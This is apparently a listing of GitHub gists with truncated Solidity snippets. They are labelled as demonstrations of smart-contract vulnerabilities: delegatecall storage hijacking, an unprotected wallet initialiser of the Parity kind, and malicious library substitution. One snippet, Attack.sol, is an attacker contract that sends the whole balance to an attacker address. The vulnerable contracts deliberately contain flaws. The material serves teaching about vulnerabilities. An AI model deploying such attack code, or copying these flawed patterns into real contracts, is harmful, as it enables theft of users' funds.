vasa-develop
/ Attack.sol
Created
July 21, 2018 18:34
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract Attack { | |
| uint storageSlot0; // corresponds to fibonacciLibrary | |
| uint storageSlot1; // corresponds to calculatedFibNumber | |
| // fallback - this will run if a specified function is not found | |
| function() public { | |
| storageSlot1 = 0; // we set calculatedFibNumber to 0, so that if withdraw | |
| // is called we don't send out any ether. | |
| <attacker_address>.transfer(this.balance); // we take all the ether | |
| } |
vasa-develop
/ WalletLibrary.sol
Created
July 21, 2018 18:34
DO NOT USE THIS CODE. THIS CODE IS USED TO DEMONSTRATE A VULNERABILITY IN A SOLIDITY CODE.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract WalletLibrary is WalletEvents { | |
| ... | |
| // throw unless the contract is not yet initialized. | |
| modifier only_uninitialized { if (m_numOwners > 0) throw; _; } | |
| // constructor - just pass on the owner array to the multiowned and | |
| // the limit to daylimit | |
| function initWallet(address[] _owners, uint _required, uint _daylimit) only_uninitialized { | |
| initDaylimit(_daylimit); |
vasa-develop
/ Wallet.sol
Created
July 21, 2018 18:35
DO NOT USE THIS CODE. THIS CODE IS USED TO DEMONSTRATE A VULNERABILITY IN A SOLIDITY CODE.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract Wallet is WalletEvents { | |
| ... | |
| // METHODS | |
| // gets called when no other function matches | |
| function() payable { | |
| // just being sent some cash? | |
| if (msg.value > 0) | |
| Deposit(msg.sender, msg.value); | |
| else if (msg.data.length > 0) | |
| _walletLibrary.delegatecall(msg.data); |
vasa-develop
/ HashForEther.sol
Last active
July 21, 2018 18:37
DO NOT USE THIS CODE. THIS CODE IS USED TO DEMONSTRATE A VULNERABILITY IN A SOLIDITY CODE.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract HashForEther { | |
| function withdrawWinnings() { | |
| // Winner if the last 8 hex characters of the address are 0. | |
| require(uint32(msg.sender) == 0); | |
| _sendWinnings(); | |
| } | |
| function _sendWinnings() { | |
| msg.sender.transfer(this.balance); |
vasa-develop
/ WalletLibrary.sol
Created
July 21, 2018 18:38
DO NOT USE THIS CODE. THIS CODE IS USED TO DEMONSTRATE A VULNERABILITY IN A SOLIDITY CODE.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract WalletLibrary is WalletEvents { | |
| ... | |
| // METHODS | |
| ... | |
| // constructor is given number of sigs required to do protected "onlymanyowners" transactions | |
| // as well as the selection of addresses capable of confirming them. | |
| function initMultiowned(address[] _owners, uint _required) { |
vasa-develop
/ Rot13Encryption.sol
Created
July 21, 2018 18:39
DO NOT USE THIS CODE. THIS CODE IS USED TO DEMONSTRATE A VULNERABILITY IN A SOLIDITY CODE.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //encryption contract | |
| contract Rot13Encryption { | |
| event Result(string convertedString); | |
| //rot13 encrypt a string | |
| function rot13Encrypt (string text) public { | |
| uint256 length = bytes(text).length; | |
| for (var i = 0; i < length; i++) { | |
| byte char = bytes(text)[i]; |
vasa-develop
/ EncryptionContract.sol
Created
July 21, 2018 18:40
DO NOT USE THIS CODE. THIS CODE IS USED TO DEMONSTRATE A VULNERABILITY IN A SOLIDITY CODE.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import "Rot13Encryption.sol"; | |
| // encrypt your top secret info | |
| contract EncryptionContract { | |
| // library for encryption | |
| Rot13Encryption encryptionLibrary; | |
| // constructor - initialise the library | |
| constructor(Rot13Encryption _encryptionLibrary) { | |
| encryptionLibrary = _encryptionLibrary; | |
| } |
vasa-develop
/ Rot26Encryption.sol
Created
July 21, 2018 18:41
DO NOT USE THIS CODE. THIS CODE IS USED TO DEMONSTRATE A VULNERABILITY IN A SOLIDITY CODE.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //encryption contract | |
| contract Rot26Encryption { | |
| event Result(string convertedString); | |
| //rot13 encrypt a string | |
| function rot13Encrypt (string text) public { | |
| uint256 length = bytes(text).length; | |
| for (var i = 0; i < length; i++) { | |
| byte char = bytes(text)[i]; |
vasa-develop
/ Print.sol
Created
July 21, 2018 18:41
DO NOT USE THIS CODE. THIS CODE IS USED TO DEMONSTRATE A VULNERABILITY IN A SOLIDITY CODE.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract Print{ | |
| event Print(string text); | |
| function rot13Encrypt(string text) public { | |
| emit Print(text); | |
| } | |
| } |
vasa-develop
/ Blank.sol
Created
July 21, 2018 18:42
DO NOT USE THIS CODE. THIS CODE IS USED TO DEMONSTRATE A VULNERABILITY IN A SOLIDITY CODE.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract Blank { | |
| event Print(string text); | |
| function () { | |
| emit Print("Here"); | |
| //put malicious code here and it will run | |
| } | |
| } |